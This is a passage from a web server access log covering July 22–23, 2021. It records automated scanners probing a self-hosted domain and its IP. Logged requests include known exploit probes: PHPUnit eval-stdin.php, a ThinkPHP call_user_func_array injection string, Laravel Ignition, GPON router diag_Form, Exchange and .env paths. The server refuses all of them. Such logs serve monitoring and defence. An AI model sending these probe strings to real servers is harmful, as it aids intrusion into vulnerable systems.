(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" "-" [22/Jul/2021:06:03:10 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:06:11:36 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:36 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:37 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:37 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:39 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [22/Jul/2021:06:11:39 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:41 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:41 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:44 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:44 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:06:11:45 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:07:16:57 +0000] 444 - GET https mx.moralanimal.net "/owa" [Client 94.198.51.204] [Length 0] [Gzip -] "python-requests/2.24.0" "-" [22/Jul/2021:07:17:00 +0000] 444 - GET https m.moralanimal.net "/owa" [Client 94.198.51.204] [Length 0] [Gzip -] "python-requests/2.24.0" "-" [22/Jul/2021:07:17:01 +0000] 444 - GET https owa.moralanimal.net "/owa" [Client 94.198.51.204] [Length 0] [Gzip -] "python-requests/2.24.0" "-" [22/Jul/2021:07:18:21 +0000] 400 - - http localhost "-" [Client 87.251.67.40] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:07:24:59 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Jul/2021:09:05:25 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:09:05:25 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:09:41:19 +0000] 444 - GET https 64.22.21.87 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.133] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Jul/2021:10:57:50 +0000] 444 - HEAD https 64.22.21.87 "/" [Client 123.160.221.5] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [22/Jul/2021:10:57:51 +0000] 444 - HEAD https smtp.moralanimal.net "/" [Client 123.160.221.5] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [22/Jul/2021:10:57:53 +0000] 444 - HEAD https 87.21.22.64.aeneasdsl.com "/" [Client 123.160.221.5] [Length 0] [Gzip -] "Chrome/54.0 (Windows NT 10.0)" "-" [22/Jul/2021:11:12:57 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:11:12:57 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:00:04 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:00:04 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:12:16 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:12:17 +0000] 444 - GET https whoami.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:22:18 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:22:18 +0000] 444 - GET https mosquitto.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:12:36:45 +0000] 444 - GET https 64.22.21.87 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [22/Jul/2021:13:28:36 +0000] 444 - GET https localhost "/t4" [Client 109.248.6.115] [Length 0] [Gzip -] "masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng)" "-" [22/Jul/2021:14:05:15 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:14:05:16 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:14:14:00 +0000] 444 - GET https 64.22.21.87 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Jul/2021:14:16:43 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [22/Jul/2021:14:19:59 +0000] 400 - - http localhost "-" [Client 94.232.41.162] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:15:05:55 +0000] 400 - - http localhost "-" [Client 91.220.163.142] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:15:37:44 +0000] 400 - GET http 64.22.21.87 "/" [Client 149.202.176.189] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Jul/2021:16:19:13 +0000] 400 - - http localhost "-" [Client 91.220.163.142] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:16:36:08 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:16:36:09 +0000] 444 - GET https komga.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [22/Jul/2021:17:41:59 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 34.123.18.170] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [22/Jul/2021:19:12:55 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:19:17:36 +0000] 444 - GET https 64.22.21.87 "/" [Client 74.120.14.38] [Length 0] [Gzip -] "-" "-" [22/Jul/2021:19:17:37 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.38] [Length 252] [Gzip -] "-" "-" [22/Jul/2021:19:17:37 +0000] 400 - GET http 64.22.21.87 "/" [Client 74.120.14.38] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [22/Jul/2021:21:00:16 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:08:11 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [22/Jul/2021:21:23:51 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [22/Jul/2021:22:28:28 +0000] 444 - GET https 64.22.21.87 "/" [Client 178.32.197.80] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [22/Jul/2021:22:46:43 +0000] 400 - GET http 64.22.21.87 "/config/getuser?index=0" [Client 198.98.61.236] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [22/Jul/2021:22:48:14 +0000] 444 - GET https 64.22.21.87 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.154] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [22/Jul/2021:23:00:26 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [22/Jul/2021:23:20:00 +0000] 444 - GET https 64.22.21.87 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:00 +0000] 444 - GET https 64.22.21.87 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:03 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:04 +0000] 444 - POST https 64.22.21.87 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.21.87:443" [22/Jul/2021:23:20:07 +0000] 444 - GET https 64.22.21.87 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:07 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:07 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:08 +0000] 444 - GET https 64.22.21.87 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:10 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:12 +0000] 444 - GET https 64.22.21.87 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [22/Jul/2021:23:20:12 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:00:11:56 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:00:11:57 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:00:45:53 +0000] 444 - GET https 64.22.21.87 "/" [Client 172.104.27.6] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [23/Jul/2021:01:27:18 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:01:27:19 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:02:07:19 +0000] 444 - GET https 64.22.21.87 "/.env" [Client 37.229.198.180] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" "-" [23/Jul/2021:03:42:13 +0000] 444 - GET https 64.22.21.87 "/" [Client 192.241.211.145] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Jul/2021:04:02:12 +0000] 444 - GET https 64.22.21.87 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [23/Jul/2021:05:08:02 +0000] 444 - GET https 64.22.21.87 "/" [Client 216.218.206.66] [Length 0] [Gzip -] "-" "-" [23/Jul/2021:06:33:51 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:06:33:51 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:07:12:40 +0000] 444 - GET https www.radarr.moralanimal.net "/" [Client 69.127.113.140] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [23/Jul/2021:07:52:29 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:07:52:30 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:08:55:16 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24" "-" [23/Jul/2021:08:55:16 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0" "-" [23/Jul/2021:08:55:16 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [23/Jul/2021:09:03:24 +0000] 444 - GET https 64.22.21.87 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [23/Jul/2021:09:06:45 +0000] 400 - GET http 64.22.21.87 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Jul/2021:09:41:32 +0000] 444 - GET https 64.22.21.87 "/" [Client 93.174.93.76] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [23/Jul/2021:09:48:13 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:09:48:13 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:10:06:19 +0000] 400 - - http localhost "-" [Client 185.202.2.147] [Length 154] [Gzip -] "-" "-" [23/Jul/2021:10:42:09 +0000] 444 - GET https 64.22.21.87 "/" [Client 185.56.80.65] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [23/Jul/2021:10:42:15 +0000] 400 - - https localhost "-" [Client 23.129.64.148] [Length 154] [Gzip -] "-" "-" [23/Jul/2021:10:42:16 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.148] [Length 0] [Gzip -] "-" "-" [23/Jul/2021:10:42:18 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 23.129.64.148] [Length 0] [Gzip -] "-" "-" [23/Jul/2021:11:36:56 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:11:36:56 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [23/Jul/2021:12:34:31 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [23/Jul/2021:12:34:31 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [23/Jul/2021:12:34:33 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [23/Jul/2021:12:34:34 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [23/Jul/2021:12:34:35 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 143.244.41.194] [Length 0] [Gzip -] "curl/7.64.0" "-" [23/Jul/2021:13:17:17 +0000] 444 - GET https 64.22.21.87 "/actuator/health" [Client 192.241.219.45] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [23/Jul/2021:13:23:02 +0000] 400 - GET http 64.22.21.87 "/" [Client 89.248.173.131] [Length 252] [Gzip -] "-" "-" [23/Jul/2021:13:50:32 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [23/Jul/2021:15:23:31 +0000] 444 - GET https 64.22.21.87 "/" [Client 101.33.77.240] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Jul/2021:15:23:32 +0000] 444 - GET https 64.22.21.87 "/" [Client 101.33.77.240] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [23/Jul/2021:15:33:03 +0000] 400 - - http localhost "-" [Client 101.33.77.240] [Length 154] [Gzip -] "-" "-" [23/Jul/2021:15:54:35 +0000] 444 - GET https 64.22.21.87 "/" [Client 104.206.128.42] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [23/Jul/2021:16:58:49 +0000] 444 - GET https 64.22.21.87 "/" [Client 167.248.133.40] [Length 0] [Gzip -] "-" "-" [23/Jul/2021:16:58:50 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.40] [Length 252] [Gzip -] "-" "-" [23/Jul/2021:16:58:51 +0000] 400 - GET http 64.22.21.87 "/" [Client 167.248.133.40] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [23/Jul/2021:17:28:47 +0000] 444 - POST https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:49 +0000] 444 - POST https 64.22.21.87 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:49 +0000] 444 - GET https 64.22.21.87 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:50 +0000] 444 - GET https 64.22.21.87 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [23/Jul/2021:17:28:52 +0000] 444 - POST https 64.22.21.87 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 